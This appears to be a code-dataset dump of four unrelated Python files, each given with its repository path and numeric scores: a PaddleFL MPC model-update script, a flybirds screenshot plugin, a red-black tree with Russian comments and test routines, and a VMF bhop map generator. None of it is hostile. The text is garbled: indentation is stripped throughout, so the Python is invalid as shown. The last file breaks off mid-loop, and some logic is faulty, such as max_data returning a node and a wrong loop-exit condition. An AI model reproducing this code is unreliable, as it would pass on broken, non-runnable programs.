# Step 1. initialize MPC environment and load MPC model into default_main_program to update.
pfl_mpc.init(mpc_protocol_name, role, ip, server, port)
mpc_du.load_mpc_model(exe=exe,
mpc_model_dir=mpc_model_dir,
mpc_model_filename=mpc_model_filename)
# Step 2. MPC update
epoch_num = network.MPC_UPDATE_EPOCH
batch_size = network.BATCH_SIZE
mpc_data_dir = "../mpc_data/"
feature_file = mpc_data_dir + "house_feature"
feature_shape = (13,)
label_file = mpc_data_dir + "house_label"
label_shape = (1,)
loss_file = "./tmp/uci_mpc_loss.part{}".format(role)
if os.path.exists(loss_file):
os.remove(loss_file)
updated_model_name = 'mpc_updated_model'
feature_name = 'x'
label_name = 'y'
# fetch loss if needed
loss = fluid.default_main_program().global_block().var('mean_0.tmp_0')
loader = process_data.get_mpc_dataloader(feature_file, label_file, feature_shape, label_shape,
feature_name, label_name, role, batch_size)
start_time = time.time()
for epoch_id in range(epoch_num):
step = 0
for sample in loader():
mpc_loss = exe.run(feed=sample, fetch_list=[loss.name])
if step % 50 == 0:
print('Epoch={}, Step={}, Loss={}'.format(epoch_id, step, mpc_loss))
with open(loss_file, 'ab') as f:
f.write(np.array(mpc_loss).tostring())
step += 1
end_time = time.time()
print('Mpc Updating of Epoch={} Batch_size={}, cost time in seconds:{}'
.format(epoch_num, batch_size, (end_time - start_time)))
# Step 3. save updated MPC model as a trainable model.
mpc_du.save_trainable_model(exe=exe,
model_dir=updated_model_dir,
model_filename=updated_model_name)
print('Successfully save mpc updated model into:{}'.format(updated_model_dir))
if __name__ == '__main__':
role, server, port = int(sys.argv[1]), sys.argv[2], int(sys.argv[3])
mpc_model_dir = './tmp/mpc_models_to_update/model_share_{}'.format(role)
mpc_model_filename = 'model_to_update'
updated_model_dir = './tmp/mpc_models_updated/updated_model_share_{}'.format(role)
load_uci_update(role=role,
ip='localhost',
server=server,
port=port,
mpc_model_dir=mpc_model_dir,
mpc_model_filename=mpc_model_filename,
updated_model_dir=updated_model_dir) | python/paddle_fl/mpc/examples/model_encryption/update/update_mpc_model.py | import os
import sys
import time
import numpy as np
import paddle.fluid as fluid
import paddle_fl.mpc as pfl_mpc
from paddle_fl.mpc.data_utils.data_utils import get_datautils
sys.path.append('..')
import network
import process_data
mpc_protocol_name = 'aby3'
mpc_du = get_datautils(mpc_protocol_name)
def load_uci_update(role, ip, server, port, mpc_model_dir, mpc_model_filename, updated_model_dir):
"""
Load, update and save uci MPC model.
"""
place = fluid.CPUPlace()
exe = fluid.Executor(place)
# Step 1. initialize MPC environment and load MPC model into default_main_program to update.
pfl_mpc.init(mpc_protocol_name, role, ip, server, port)
mpc_du.load_mpc_model(exe=exe,
mpc_model_dir=mpc_model_dir,
mpc_model_filename=mpc_model_filename)
# Step 2. MPC update
epoch_num = network.MPC_UPDATE_EPOCH
batch_size = network.BATCH_SIZE
mpc_data_dir = "../mpc_data/"
feature_file = mpc_data_dir + "house_feature"
feature_shape = (13,)
label_file = mpc_data_dir + "house_label"
label_shape = (1,)
loss_file = "./tmp/uci_mpc_loss.part{}".format(role)
if os.path.exists(loss_file):
os.remove(loss_file)
updated_model_name = 'mpc_updated_model'
feature_name = 'x'
label_name = 'y'
# fetch loss if needed
loss = fluid.default_main_program().global_block().var('mean_0.tmp_0')
loader = process_data.get_mpc_dataloader(feature_file, label_file, feature_shape, label_shape,
feature_name, label_name, role, batch_size)
start_time = time.time()
for epoch_id in range(epoch_num):
step = 0
for sample in loader():
mpc_loss = exe.run(feed=sample, fetch_list=[loss.name])
if step % 50 == 0:
print('Epoch={}, Step={}, Loss={}'.format(epoch_id, step, mpc_loss))
with open(loss_file, 'ab') as f:
f.write(np.array(mpc_loss).tostring())
step += 1
end_time = time.time()
print('Mpc Updating of Epoch={} Batch_size={}, cost time in seconds:{}'
.format(epoch_num, batch_size, (end_time - start_time)))
# Step 3. save updated MPC model as a trainable model.
mpc_du.save_trainable_model(exe=exe,
model_dir=updated_model_dir,
model_filename=updated_model_name)
print('Successfully save mpc updated model into:{}'.format(updated_model_dir))
if __name__ == '__main__':
role, server, port = int(sys.argv[1]), sys.argv[2], int(sys.argv[3])
mpc_model_dir = './tmp/mpc_models_to_update/model_share_{}'.format(role)
mpc_model_filename = 'model_to_update'
updated_model_dir = './tmp/mpc_models_updated/updated_model_share_{}'.format(role)
load_uci_update(role=role,
ip='localhost',
server=server,
port=port,
mpc_model_dir=mpc_model_dir,
mpc_model_filename=mpc_model_filename,
updated_model_dir=updated_model_dir) | 0.341692 | 0.08819 |
import os
import time
import traceback
from base64 import b64decode
import flybirds.core.global_resource as gr
import flybirds.utils.file_helper as file_helper
import flybirds.utils.flybirds_log as log
import flybirds.utils.uuid_helper as uuid_helper
from flybirds.core.global_context import GlobalContext as g_context
from flybirds.core.plugin.plugins.default.ios_snapshot import get_screen
class BaseScreen:
@staticmethod
def screen_shot(path):
"""
Take a screenshot and save
"""
log.info(f"[screen_shot] screen shot start. path is:{path}")
cur_platform = g_context.platform
try:
if cur_platform is None:
log.error('[screen_shot] get cur_platform is None!')
raise Exception("[screen_shot] get cur_platform is None!")
poco = g_context.ui_driver_instance
screen_size = gr.get_device_size()
if cur_platform.strip().lower() == "ios":
b64img, fmt = get_screen()
else:
b64img, fmt = poco.snapshot(width=screen_size[1])
open(path, "wb").write(b64decode(b64img))
except Exception as e:
log.warn(
"Screenshot failed path: {}, error: {}".format(path, str(e)),
traceback.format_exc(),
)
log.info("[screen_shot] screen shot end!")
@staticmethod
def screen_link_to_behave(scenario, step_index, tag=None):
"""
screenshot address and linked to the <scr> tag
The label information is placed in the description of the scene,
and the json report is processed after all the runs are finished,
and the <scr> information in the description is converted into
embeddings information in the step.
"""
feature_name = file_helper.valid_file_name(scenario.feature.name)
scenario_name = file_helper.valid_file_name(scenario.name)
if len(scenario.steps) > step_index >= 0:
file_name = None
if not (tag is None):
file_name = tag
file_name += (
scenario_name
+ uuid_helper.create_short_uuid()
+ str(int(round(time.time() * 1000)))
+ ".png"
)
screen_shot_dir = gr.get_screen_save_dir()
if not (screen_shot_dir is None):
current_screen_dir = os.path.join(screen_shot_dir,
feature_name)
else:
current_screen_dir = os.path.join(feature_name)
log.info(f"[screen_link_to_behave] screen_shot_dir path :"
f"{screen_shot_dir} and "
f"current_screen_dir path: {current_screen_dir}")
file_helper.create_dirs_path_object(current_screen_dir)
src_path = "../screenshot/{}/{}".format(feature_name, file_name)
log.info("[screen_link_to_behave] src_path: {}".format(src_path))
data = (
'embeddingsTags, stepIndex={}, <image class ="screenshot"'
' width="375" src="{}" />'.format(step_index, src_path)
)
scenario.description.append(data)
g_context.screen.screen_shot(
os.path.join(current_screen_dir, file_name)) | flybirds/core/plugin/plugins/default/screen.py | import os
import time
import traceback
from base64 import b64decode
import flybirds.core.global_resource as gr
import flybirds.utils.file_helper as file_helper
import flybirds.utils.flybirds_log as log
import flybirds.utils.uuid_helper as uuid_helper
from flybirds.core.global_context import GlobalContext as g_context
from flybirds.core.plugin.plugins.default.ios_snapshot import get_screen
class BaseScreen:
@staticmethod
def screen_shot(path):
"""
Take a screenshot and save
"""
log.info(f"[screen_shot] screen shot start. path is:{path}")
cur_platform = g_context.platform
try:
if cur_platform is None:
log.error('[screen_shot] get cur_platform is None!')
raise Exception("[screen_shot] get cur_platform is None!")
poco = g_context.ui_driver_instance
screen_size = gr.get_device_size()
if cur_platform.strip().lower() == "ios":
b64img, fmt = get_screen()
else:
b64img, fmt = poco.snapshot(width=screen_size[1])
open(path, "wb").write(b64decode(b64img))
except Exception as e:
log.warn(
"Screenshot failed path: {}, error: {}".format(path, str(e)),
traceback.format_exc(),
)
log.info("[screen_shot] screen shot end!")
@staticmethod
def screen_link_to_behave(scenario, step_index, tag=None):
"""
screenshot address and linked to the <scr> tag
The label information is placed in the description of the scene,
and the json report is processed after all the runs are finished,
and the <scr> information in the description is converted into
embeddings information in the step.
"""
feature_name = file_helper.valid_file_name(scenario.feature.name)
scenario_name = file_helper.valid_file_name(scenario.name)
if len(scenario.steps) > step_index >= 0:
file_name = None
if not (tag is None):
file_name = tag
file_name += (
scenario_name
+ uuid_helper.create_short_uuid()
+ str(int(round(time.time() * 1000)))
+ ".png"
)
screen_shot_dir = gr.get_screen_save_dir()
if not (screen_shot_dir is None):
current_screen_dir = os.path.join(screen_shot_dir,
feature_name)
else:
current_screen_dir = os.path.join(feature_name)
log.info(f"[screen_link_to_behave] screen_shot_dir path :"
f"{screen_shot_dir} and "
f"current_screen_dir path: {current_screen_dir}")
file_helper.create_dirs_path_object(current_screen_dir)
src_path = "../screenshot/{}/{}".format(feature_name, file_name)
log.info("[screen_link_to_behave] src_path: {}".format(src_path))
data = (
'embeddingsTags, stepIndex={}, <image class ="screenshot"'
' width="375" src="{}" />'.format(step_index, src_path)
)
scenario.description.append(data)
g_context.screen.screen_shot(
os.path.join(current_screen_dir, file_name)) | 0.295535 | 0.065306 |
import Color
import node
class RBTree(object):
RBNode = node.RBNode
def __init__(self, new_node=RBNode):
"""setters"""
self._nil = new_node(data=None) # Листья нули и всегда черны
self._root = self.nil # В начале корень нулевой
self._new_node = new_node # вызов, создающий узел
"""getters"""
@property
def root(self):
return self._root
@property
def nil(self):
return self._nil
def _grandfather(self, node): # возвращает дедушку узла
if node != self.nil and node.parent != self.nil:
return node.parent.parent
else:
return self.nil # mb None
def _uncle(self, node): # возвращает дядю узла
g = self._grandfather(node)
if g == self.nil:
return self.nil
else:
if node.parent == g.leftChild:
return g.rightChild
else:
return g.leftChild
def _brother(self, node): # возвращает правого или левого брата
assert node.parent != self.nil
if node == node.parent.leftChild:
return node.parent.rightChild
else:
return node.parent.leftChild
def min_data(self, node=None): # Находит минимум в поддереве узла х
if node is None:
node = self.root
while node.leftChild != self.nil:
node = node.leftChild
return node.data
def max_data(self, node=None): # Находит максимум в поддереве узла х
if node is None:
node = self.root
while node.rightChild != self.nil:
node = node.rightChild
return node
def delete_data(self, data): # вызывает операцию удаления для узла с параметром data
node = self.find(data)
if node == self.nil:
return False
self.delete_node(node)
return True
def delete_node(self, node):
c = Color.Color()
if not node or node == self.nil:
return
if node.leftChild == self.nil or node.rightChild == self.nil:
y_node = node
else:
y_node = node.rightChild
while y_node.leftChild != self.nil:
y_node = y_node.leftChild
if y_node.leftChild != self.nil:
x = y_node.leftChild
else:
x = y_node.rightChild
x._parent = y_node.parent
if y_node.parent:
if y_node == y_node.parent.leftChild:
y_node.parent._leftChild = x
else:
y_node.parent._rightChild = x
else:
self._root = x
if y_node != node:
node._data = y_node.data
if y_node.color == c.BLACK:
self._delete_fix(x)
def _delete_fix(self, node):
c = Color.Color()
while node.color == c.BLACK and node != self.root:
b = self._brother(node)
if b.color == c.RED:
b._color = c.BLACK
node.parent._color = c.RED
self._turn_left(node.parent) if node == node.parent.leftChild else self._turn_right(node.parent)
b = self._brother(node)
if b.leftChild.color == c.BLACK and b.rightChild.color == c.BLACK:
b._color = c.RED
node = node.parent
else:
if node == node.parent.leftChild:
if b.rightChild.color == c.BLACK:
b.leftChild._color = c.BLACK
b._color = c.RED
self._turn_right(b)
b = self._brother(node)
else:
if b.leftChild.color == c.BLACK:
b.rightChild._color = c.BLACK
b._color = c.RED
self._turn_left(b)
b = self._brother(node)
b._color = node.parent.color
node.parent._color = c.BLACK
if node == node.parent.leftChild:
b.rightChild._color = c.BLACK
self._turn_left(node.parent)
else:
b.leftChild._color = c.BLACK
self._turn_right(node.parent)
node = self.root
node._color = c.BLACK
def find(self, data, node=None): # находит узел с параметром data, если такой есть
if node is None:
node = self.root
while node != self.nil and data != node.data:
if data < node.data:
node = node.leftChild
else:
node = node.rightChild
return node
def add_data(self, data):
self.add_node(self._new_node(data=data))
def add_node(self, node): # добавление узла node в дерево
c = Color.Color()
par = self.nil
ch = self.root
while ch != self.nil:
par = ch
if node.data < ch.data:
ch = ch.leftChild
else:
ch = ch.rightChild
node._parent = par
if par == self.nil:
self._root = node
elif node.data < par.data:
par._leftChild = node
else:
par._rightChild = node
node._leftChild = self.nil
node._rightChild = self.nil
node._color = c.RED
self._add_fix(node)
def _add_fix(self, node): # восстановление свойств красно-черного дерева
c = Color.Color()
while node.parent.color:
u = self._uncle(node)
if u.color:
node.parent._color = c.BLACK
u._color = c.BLACK
self._grandfather(node)._color = c.RED
node = self._grandfather(node)
else:
if node.parent == node.parent.parent.leftChild:
if node == node.parent.rightChild:
node = node.parent
self._turn_left(node)
node.parent._color = c.BLACK
self._grandfather(node)._color = c.RED
self._turn_right(self._grandfather(node))
else:
if node == node.parent.leftChild:
node = node.parent
self._turn_right(node)
node.parent._color = c.BLACK
self._grandfather(node)._color = c.RED
self._turn_left(self._grandfather(node))
self.root._color = c.BLACK
def tree_black_height(self):
node = self.root
count = 0
while node is not None:
if not node.color or node == self.nil:
count += 1
node = node.leftChild
return count
def tree_height(self, node=None, l_height=0, r_height=0):
if node is None:
node = self.root
if node.leftChild is None and node.rightChild is None:
return 1
else:
if node.leftChild is not None:
l_height = self.tree_height(node.leftChild, l_height, r_height)
if node.rightChild is not None:
r_height = self.tree_height(node.rightChild, l_height, r_height)
if l_height > r_height:
return l_height + 1
else:
return r_height + 1
def _turn_left(self, node): # выполнить левый поворот узла
ch = node.rightChild
node._rightChild = ch.leftChild
if ch.leftChild != self.nil:
ch.leftChild._parent = node
ch._parent = node.parent
if node.parent == self.nil:
self._root = ch
elif node == node.parent.leftChild:
node.parent._leftChild = ch
else:
node.parent._rightChild = ch
ch._leftChild = node
node._parent = ch
def _turn_right(self, node): # выполнить правый поворот узла
ch = node.leftChild
node._leftChild = ch.rightChild
if ch.rightChild != self.nil:
ch.rightChild._parent = node
ch._parent = node.parent
if node.parent == self.nil:
self._root = ch
elif node == node.parent.rightChild:
node.parent._rightChild = ch
else:
node.parent._leftChild = ch
ch._rightChild = node
node._parent = ch
def check_prop(self): # returns True if RBTree is ok
def check(x):
if (x.leftChild and not x.rightChild) or (x.rightChild and not x.leftChild):
return 0, False
if not x.leftChild and not x.rightChild and x.color:
return 0, False
if x.color and x.leftChild and x.rightChild:
if x.leftChild.color or x.rightChild.color:
return 0, False
if x.leftChild and x.rightChild:
if x.leftChild != self.nil and x != x.leftChild.parent:
return 0, False
if x.rightChild != self.nil and x != x.rightChild.parent:
return 0, False
l_count, l_ok = check(x.leftChild)
if not l_ok:
return 0, False
r_count, r_ok = check(x.rightChild)
if not r_ok:
return 0, False
if l_count != r_count:
return 0, False
return l_count, True
else:
return 0, True
num_black, is_ok = check(self.root)
return is_ok and not self.root.color
def save(t, f,): # writing file in a file f.dot
def node_c(x):
if x.color:
return "RED"
else:
return "BLACK"
def writing(x): # BFA pre-order search
f.write(" data=\"%s\", color=\"%s\" \t[" % (x, node_c(x)))
if x.leftChild != t.nil:
f.write("leftChild = \"%s\" " % (x.leftChild))
if x.rightChild != t.nil:
f.write("rightChild = \"%s\"" % (x.rightChild))
f.write("]")
f.write("\n")
if x.leftChild:
if x.leftChild != t.nil:
writing(x.leftChild)
if x.rightChild:
if x.rightChild != t.nil:
writing(x.rightChild)
f.write("Red black tree" + '\n')
writing(t.root)
def test_add(t): # Insert datas one by one checking prop
datas = [5, 3, 6, 7, 2, 4, 21, 8, 99, 9, 32, 23]
for i, data in enumerate(datas):
t.add_data(data)
assert t.check_prop()
def test_min_max(t):
datas = [5, 3, 6, 7, 2, 4, 21, 8, 99, 9, 32, 23]
m_datas = [5, 3, 21, 10, 32]
for i, data in enumerate(datas):
t.add_data(data)
for i, m_data in enumerate(m_datas):
if t.find(m_data).data is not None:
print("максимум в поддереве узла", m_data, " = ", t.max_data(t.find(m_data)))
print("минимум в поддереве узла", m_data, " = ", t.min_data(t.find(m_data)))
print("")
else:
print("нет узла", m_data, "в дереве")
print("")
def test_find(t):
datas = [5, 3, 6, 7, 2, 4, 21, 8, 99, 9, 32, 23]
s_datas = [6, 3, 24, 23, 99, 101]
for i, data in enumerate(datas):
t.add_data(data)
for i, s_data in enumerate(s_datas):
if t.find(s_data).data is not None:
print("data", s_data, "exists")
else:
print("data", s_data, "is not exist")
def test_random_insert(t, s):
max_data = 2000
r.seed(2)
rand_datas = list(r.SystemRandom().sample(range(max_data), s))
for i, data in enumerate(rand_datas):
t.add_data(data)
assert t.check_prop()
def test_delete(t):
datas = [5, 3, 6, 7, 2, 4, 21, 8, 99, 9, 32, 23]
ddatas = [3, 21, 7, 32]
for i, data in enumerate(datas):
t.add_data(data)
for i, ddata in enumerate(ddatas):
t.delete_data(ddata)
for k, data in enumerate(datas):
if t.find(data).data is not None:
print("%d" % data, end=' ')
print("")
assert t.check_prop()
if '__main__' == __name__:
import os
import random as r
def save_tree(tree, filename):
f = open('%s.txt' % filename, 'w')
save(tree, f)
f.close()
os.system('txt %s.txt -T' % filename)
r.seed(2)
t = RBTree()
print("Введите цифру 1, если хотите построить дерево со случайным набором ключей и определить его высоту")
print("Введите цифру 2, если хотите построить дерево с заданным набором ключей, чтобы проверить вставку")
print("Введите цифру 3, если хотите протестировать удаление узлов")
print("Введите цифру 4, если хотите протестировать max и min")
print("Введите цифру 5, если хотите протестировать поиск")
a = int(input())
if a == 1:
for size in range(30, 101, 10):
h_1, h_2, hh_1, hh_2, c_1, c_2, c_3, c_4 = 0, 0, 0, 0, 0, 0, 0, 0
for i in range(1000):
t = RBTree()
test_random_insert(t, size)
if i == 0:
h_1 = t.tree_height()
h_2 = t.tree_black_height()
if t.tree_height() == h_1:
c_1 += 1
else:
hh_1 = t.tree_height()
c_2 += 1
if t.tree_black_height() == h_2:
c_3 += 1
else:
hh_2 = t.tree_black_height()
c_4 += 1
print("----------")
print("Количество ключей = %d" % size)
print("Средняя черн высота дерева = %f" % ((h_2 * c_3 + hh_2 * c_4) / 1000))
print("Средняя высота дерева = %f" % ((h_1 * c_1 + hh_1 * c_2) / 1000))
elif a == 2:
test_add(t)
elif a == 3:
test_delete(t)
elif a == 4:
test_min_max(t)
elif a == 5:
test_find(t)
save_tree(t, 'tree') | code/RB_tree.py | import Color
import node
class RBTree(object):
RBNode = node.RBNode
def __init__(self, new_node=RBNode):
"""setters"""
self._nil = new_node(data=None) # Листья нули и всегда черны
self._root = self.nil # В начале корень нулевой
self._new_node = new_node # вызов, создающий узел
"""getters"""
@property
def root(self):
return self._root
@property
def nil(self):
return self._nil
def _grandfather(self, node): # возвращает дедушку узла
if node != self.nil and node.parent != self.nil:
return node.parent.parent
else:
return self.nil # mb None
def _uncle(self, node): # возвращает дядю узла
g = self._grandfather(node)
if g == self.nil:
return self.nil
else:
if node.parent == g.leftChild:
return g.rightChild
else:
return g.leftChild
def _brother(self, node): # возвращает правого или левого брата
assert node.parent != self.nil
if node == node.parent.leftChild:
return node.parent.rightChild
else:
return node.parent.leftChild
def min_data(self, node=None): # Находит минимум в поддереве узла х
if node is None:
node = self.root
while node.leftChild != self.nil:
node = node.leftChild
return node.data
def max_data(self, node=None): # Находит максимум в поддереве узла х
if node is None:
node = self.root
while node.rightChild != self.nil:
node = node.rightChild
return node
def delete_data(self, data): # вызывает операцию удаления для узла с параметром data
node = self.find(data)
if node == self.nil:
return False
self.delete_node(node)
return True
def delete_node(self, node):
c = Color.Color()
if not node or node == self.nil:
return
if node.leftChild == self.nil or node.rightChild == self.nil:
y_node = node
else:
y_node = node.rightChild
while y_node.leftChild != self.nil:
y_node = y_node.leftChild
if y_node.leftChild != self.nil:
x = y_node.leftChild
else:
x = y_node.rightChild
x._parent = y_node.parent
if y_node.parent:
if y_node == y_node.parent.leftChild:
y_node.parent._leftChild = x
else:
y_node.parent._rightChild = x
else:
self._root = x
if y_node != node:
node._data = y_node.data
if y_node.color == c.BLACK:
self._delete_fix(x)
def _delete_fix(self, node):
c = Color.Color()
while node.color == c.BLACK and node != self.root:
b = self._brother(node)
if b.color == c.RED:
b._color = c.BLACK
node.parent._color = c.RED
self._turn_left(node.parent) if node == node.parent.leftChild else self._turn_right(node.parent)
b = self._brother(node)
if b.leftChild.color == c.BLACK and b.rightChild.color == c.BLACK:
b._color = c.RED
node = node.parent
else:
if node == node.parent.leftChild:
if b.rightChild.color == c.BLACK:
b.leftChild._color = c.BLACK
b._color = c.RED
self._turn_right(b)
b = self._brother(node)
else:
if b.leftChild.color == c.BLACK:
b.rightChild._color = c.BLACK
b._color = c.RED
self._turn_left(b)
b = self._brother(node)
b._color = node.parent.color
node.parent._color = c.BLACK
if node == node.parent.leftChild:
b.rightChild._color = c.BLACK
self._turn_left(node.parent)
else:
b.leftChild._color = c.BLACK
self._turn_right(node.parent)
node = self.root
node._color = c.BLACK
def find(self, data, node=None): # находит узел с параметром data, если такой есть
if node is None:
node = self.root
while node != self.nil and data != node.data:
if data < node.data:
node = node.leftChild
else:
node = node.rightChild
return node
def add_data(self, data):
self.add_node(self._new_node(data=data))
def add_node(self, node): # добавление узла node в дерево
c = Color.Color()
par = self.nil
ch = self.root
while ch != self.nil:
par = ch
if node.data < ch.data:
ch = ch.leftChild
else:
ch = ch.rightChild
node._parent = par
if par == self.nil:
self._root = node
elif node.data < par.data:
par._leftChild = node
else:
par._rightChild = node
node._leftChild = self.nil
node._rightChild = self.nil
node._color = c.RED
self._add_fix(node)
def _add_fix(self, node): # восстановление свойств красно-черного дерева
c = Color.Color()
while node.parent.color:
u = self._uncle(node)
if u.color:
node.parent._color = c.BLACK
u._color = c.BLACK
self._grandfather(node)._color = c.RED
node = self._grandfather(node)
else:
if node.parent == node.parent.parent.leftChild:
if node == node.parent.rightChild:
node = node.parent
self._turn_left(node)
node.parent._color = c.BLACK
self._grandfather(node)._color = c.RED
self._turn_right(self._grandfather(node))
else:
if node == node.parent.leftChild:
node = node.parent
self._turn_right(node)
node.parent._color = c.BLACK
self._grandfather(node)._color = c.RED
self._turn_left(self._grandfather(node))
self.root._color = c.BLACK
def tree_black_height(self):
node = self.root
count = 0
while node is not None:
if not node.color or node == self.nil:
count += 1
node = node.leftChild
return count
def tree_height(self, node=None, l_height=0, r_height=0):
if node is None:
node = self.root
if node.leftChild is None and node.rightChild is None:
return 1
else:
if node.leftChild is not None:
l_height = self.tree_height(node.leftChild, l_height, r_height)
if node.rightChild is not None:
r_height = self.tree_height(node.rightChild, l_height, r_height)
if l_height > r_height:
return l_height + 1
else:
return r_height + 1
def _turn_left(self, node): # выполнить левый поворот узла
ch = node.rightChild
node._rightChild = ch.leftChild
if ch.leftChild != self.nil:
ch.leftChild._parent = node
ch._parent = node.parent
if node.parent == self.nil:
self._root = ch
elif node == node.parent.leftChild:
node.parent._leftChild = ch
else:
node.parent._rightChild = ch
ch._leftChild = node
node._parent = ch
def _turn_right(self, node): # выполнить правый поворот узла
ch = node.leftChild
node._leftChild = ch.rightChild
if ch.rightChild != self.nil:
ch.rightChild._parent = node
ch._parent = node.parent
if node.parent == self.nil:
self._root = ch
elif node == node.parent.rightChild:
node.parent._rightChild = ch
else:
node.parent._leftChild = ch
ch._rightChild = node
node._parent = ch
def check_prop(self): # returns True if RBTree is ok
def check(x):
if (x.leftChild and not x.rightChild) or (x.rightChild and not x.leftChild):
return 0, False
if not x.leftChild and not x.rightChild and x.color:
return 0, False
if x.color and x.leftChild and x.rightChild:
if x.leftChild.color or x.rightChild.color:
return 0, False
if x.leftChild and x.rightChild:
if x.leftChild != self.nil and x != x.leftChild.parent:
return 0, False
if x.rightChild != self.nil and x != x.rightChild.parent:
return 0, False
l_count, l_ok = check(x.leftChild)
if not l_ok:
return 0, False
r_count, r_ok = check(x.rightChild)
if not r_ok:
return 0, False
if l_count != r_count:
return 0, False
return l_count, True
else:
return 0, True
num_black, is_ok = check(self.root)
return is_ok and not self.root.color
def save(t, f,): # writing file in a file f.dot
def node_c(x):
if x.color:
return "RED"
else:
return "BLACK"
def writing(x): # BFA pre-order search
f.write(" data=\"%s\", color=\"%s\" \t[" % (x, node_c(x)))
if x.leftChild != t.nil:
f.write("leftChild = \"%s\" " % (x.leftChild))
if x.rightChild != t.nil:
f.write("rightChild = \"%s\"" % (x.rightChild))
f.write("]")
f.write("\n")
if x.leftChild:
if x.leftChild != t.nil:
writing(x.leftChild)
if x.rightChild:
if x.rightChild != t.nil:
writing(x.rightChild)
f.write("Red black tree" + '\n')
writing(t.root)
def test_add(t): # Insert datas one by one checking prop
datas = [5, 3, 6, 7, 2, 4, 21, 8, 99, 9, 32, 23]
for i, data in enumerate(datas):
t.add_data(data)
assert t.check_prop()
def test_min_max(t):
datas = [5, 3, 6, 7, 2, 4, 21, 8, 99, 9, 32, 23]
m_datas = [5, 3, 21, 10, 32]
for i, data in enumerate(datas):
t.add_data(data)
for i, m_data in enumerate(m_datas):
if t.find(m_data).data is not None:
print("максимум в поддереве узла", m_data, " = ", t.max_data(t.find(m_data)))
print("минимум в поддереве узла", m_data, " = ", t.min_data(t.find(m_data)))
print("")
else:
print("нет узла", m_data, "в дереве")
print("")
def test_find(t):
datas = [5, 3, 6, 7, 2, 4, 21, 8, 99, 9, 32, 23]
s_datas = [6, 3, 24, 23, 99, 101]
for i, data in enumerate(datas):
t.add_data(data)
for i, s_data in enumerate(s_datas):
if t.find(s_data).data is not None:
print("data", s_data, "exists")
else:
print("data", s_data, "is not exist")
def test_random_insert(t, s):
max_data = 2000
r.seed(2)
rand_datas = list(r.SystemRandom().sample(range(max_data), s))
for i, data in enumerate(rand_datas):
t.add_data(data)
assert t.check_prop()
def test_delete(t):
datas = [5, 3, 6, 7, 2, 4, 21, 8, 99, 9, 32, 23]
ddatas = [3, 21, 7, 32]
for i, data in enumerate(datas):
t.add_data(data)
for i, ddata in enumerate(ddatas):
t.delete_data(ddata)
for k, data in enumerate(datas):
if t.find(data).data is not None:
print("%d" % data, end=' ')
print("")
assert t.check_prop()
if '__main__' == __name__:
import os
import random as r
def save_tree(tree, filename):
f = open('%s.txt' % filename, 'w')
save(tree, f)
f.close()
os.system('txt %s.txt -T' % filename)
r.seed(2)
t = RBTree()
print("Введите цифру 1, если хотите построить дерево со случайным набором ключей и определить его высоту")
print("Введите цифру 2, если хотите построить дерево с заданным набором ключей, чтобы проверить вставку")
print("Введите цифру 3, если хотите протестировать удаление узлов")
print("Введите цифру 4, если хотите протестировать max и min")
print("Введите цифру 5, если хотите протестировать поиск")
a = int(input())
if a == 1:
for size in range(30, 101, 10):
h_1, h_2, hh_1, hh_2, c_1, c_2, c_3, c_4 = 0, 0, 0, 0, 0, 0, 0, 0
for i in range(1000):
t = RBTree()
test_random_insert(t, size)
if i == 0:
h_1 = t.tree_height()
h_2 = t.tree_black_height()
if t.tree_height() == h_1:
c_1 += 1
else:
hh_1 = t.tree_height()
c_2 += 1
if t.tree_black_height() == h_2:
c_3 += 1
else:
hh_2 = t.tree_black_height()
c_4 += 1
print("----------")
print("Количество ключей = %d" % size)
print("Средняя черн высота дерева = %f" % ((h_2 * c_3 + hh_2 * c_4) / 1000))
print("Средняя высота дерева = %f" % ((h_1 * c_1 + hh_1 * c_2) / 1000))
elif a == 2:
test_add(t)
elif a == 3:
test_delete(t)
elif a == 4:
test_min_max(t)
elif a == 5:
test_find(t)
save_tree(t, 'tree') | 0.593491 | 0.459015 |
from model.Vmf import Vmf
from model.Vertex import Vertex
import numpy as np
import random
def alg_bhop_concatenation(vmf: Vmf):
# cfg
n = 4000
min_size = 64
assert min_size > 8
max_size = 128
fail_seq_max = 100
block_min_distance = 256
block_xr = min_size
block_yr = min_size
block_zr = min_size / 4
i = 0
fail_seq_nr = 0
root = vmf.gen_solid(Vertex(0, 0, 12000), max_size, max_size, max_size)
solid = root
vmf.add_solid(solid.origin, solid.xr, solid.yr, solid.zr)
while i < n or fail_seq_nr >= fail_seq_max:
skip = False
# debug
print(f'{i} / {n}')
# quick math
R = solid.radius + block_min_distance
phi = random.uniform(0, 2*np.pi)
costheta = random.uniform(-1, 1)
u = random.uniform(0, 1)
theta = np.arccos(costheta)
r = R * np.cbrt(u)
x = r * np.sin(theta) * np.cos(phi)
y = r * np.sin(theta) * np.sin(phi)
z = r * np.cos(theta)
new_solid_z = int(solid.origin.z + z)
if new_solid_z % 2 != 0:
new_solid_z = new_solid_z+1
if (new_solid_z > solid.origin.z) or (new_solid_z < solid.origin.z-32):
skip = True
if not skip:
new_solid_x = int(solid.origin.x + x)
if new_solid_x % 2 != 0:
new_solid_x = new_solid_x + 1
new_solid_y = int(solid.origin.y + y)
if new_solid_y % 2 != 0:
new_solid_y = new_solid_y + 1
add_success = vmf.add_solid(Vertex(new_solid_x, new_solid_y, new_solid_z), block_xr,
block_yr, block_zr, checkCollisionType=2, material="realworldtextures2/marble/marble_02")
if add_success:
i = i + 1
fail_seq_nr = 0
# contine on new solid
solid = vmf.gen_solid(
Vertex(new_solid_x, new_solid_y, new_solid_z), block_xr, block_yr, block_zr)
else:
fail_seq_nr = fail_seq_nr+1 | modules/bhop_concatenation.py | from model.Vmf import Vmf
from model.Vertex import Vertex
import numpy as np
import random
def alg_bhop_concatenation(vmf: Vmf):
# cfg
n = 4000
min_size = 64
assert min_size > 8
max_size = 128
fail_seq_max = 100
block_min_distance = 256
block_xr = min_size
block_yr = min_size
block_zr = min_size / 4
i = 0
fail_seq_nr = 0
root = vmf.gen_solid(Vertex(0, 0, 12000), max_size, max_size, max_size)
solid = root
vmf.add_solid(solid.origin, solid.xr, solid.yr, solid.zr)
while i < n or fail_seq_nr >= fail_seq_max:
skip = False
# debug
print(f'{i} / {n}')
# quick math
R = solid.radius + block_min_distance
phi = random.uniform(0, 2*np.pi)
costheta = random.uniform(-1, 1)
u = random.uniform(0, 1)
theta = np.arccos(costheta)
r = R * np.cbrt(u)
x = r * np.sin(theta) * np.cos(phi)
y = r * np.sin(theta) * np.sin(phi)
z = r * np.cos(theta)
new_solid_z = int(solid.origin.z + z)
if new_solid_z % 2 != 0:
new_solid_z = new_solid_z+1
